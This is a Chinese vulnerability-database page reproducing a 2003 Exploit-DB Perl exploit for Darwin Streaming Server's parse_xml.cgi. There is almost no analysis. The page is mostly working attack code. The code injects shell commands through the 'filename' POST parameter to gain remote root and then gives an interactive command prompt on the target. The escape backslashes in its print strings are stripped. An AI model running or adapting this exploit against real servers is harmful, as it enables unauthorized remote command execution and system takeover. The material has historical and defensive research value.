Darwin Streaming Server 4.1.2 – ‘parse_xml.cgi’ Code Execution

Darwin Streaming Server 4.1.2 – ‘parse_xml.cgi’ Code Execution

漏洞ID 1053723 漏洞类型
发布时间 2003-02-24 更新时间 2003-02-24
图片[1]-Darwin Streaming Server 4.1.2 – ‘parse_xml.cgi’ Code Execution-安全小百科CVE编号 N/A
图片[2]-Darwin Streaming Server 4.1.2 – ‘parse_xml.cgi’ Code Execution-安全小百科CNNVD-ID N/A
漏洞平台 OSX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1739
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
#
# QTTS REMOTE ROOT  exploit by FOX_MULDER ([email protected])
# FOX_MULDER PRESENTS    fox_mulder_at_abv.bg
#
# Darwin(OSX)4.x(?) 5.X QTSS(Quick Time Stream Server) 3.X
#
# The bug in Darwin 5.X with unpatched QTSS in parse_xml.cgi which lead to remote root compromise:
#    $filename = $query->{'filename'};
#    $templatefile = $query->{'template'};
# Based on http://wbyte.ath.cx/~wbyte/researches/qtss-core.txt#
###########################

use IO::Socket;
use LWP::Simple; 
use LWP 5.64;

sub Usage {
print STDERR "nQTTS REMOTE ROOT EXPLOIT BY FOX_MULDER !!!n";
print STDERR "Usage:cenex.pl <www.example.com> n";
exit;
}

if (@ARGV < 1)
{
 Usage();
}


$host = @ARGV[0];
print "nn !!!PRIVATE EXPLOIT!!! nn";
print "Darwin QTTS Remote Root Exploit by FOX_MULDERn";

print "n[+] Conecting to $hostn";
&check($command="id");
&hack($command="uname -a;id");
while ()
 {
    print "Command# ";
    while(<STDIN>)
     {
        $command=$_;
        chomp($command);
        exit() if ($command eq 'exit');
        last;
     }
    &hack($command);
 }

&hack($command);

sub hack{
my $browser = LWP::UserAgent->new;
   $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');

  my $url = "http://$host:1220/parse_xml.cgi";
  my $response = $browser->post( $url,
    [
        'filename' => ";$command|"
]
  );


  die "Received invalid response type", $response->content_type
   unless $response->content_type eq 'text/html';

        print $response->content;


}



sub check{
print "[+] Checking if vulnerable . . .n";
my $browser = LWP::UserAgent->new;
   $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');

  my $url = "http://$host:1220/parse_xml.cgi";
  my $response = $browser->post( $url,
    [
        'filename' => ";$command|"
]
  );

 	my $code = $response->status_line;
	if($code != 200){
	print "Not vulnerablen";
	exit;
        }
       print "[+] Status $code ...n";
}

# milw0rm.com [2003-02-24]

相关推荐: FreeBSD periodic /tmp File Race Condition Vulnerability

FreeBSD periodic /tmp File Race Condition Vulnerability 漏洞ID 1103491 漏洞类型 Race Condition Error 发布时间 2001-01-29 更新时间 2001-01-29 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享